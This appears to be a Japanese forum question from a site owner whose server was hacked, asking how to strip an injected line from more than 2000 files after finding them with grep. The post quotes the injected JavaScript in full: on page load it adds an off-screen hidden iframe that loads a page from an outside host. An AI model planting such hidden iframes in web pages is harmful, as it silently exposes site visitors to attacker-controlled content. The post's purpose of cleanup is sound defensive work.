昨日、私のサイトがハッキングされ、次のようなコードが含まれていました。
<script>
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = \"http://fenwaywest.com/media/index.php\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>";
以下のコマンドを使用してサーバーを検索し、影響を受けるファイルを見つけると、
grep -r "<script> function frmAdd()" /path/
2000以上のファイルを取得しました。
ここで、その行のみを削除する必要があります。2000 個のファイルすべてからその行を削除するためだけにコマンドをガイドできますか?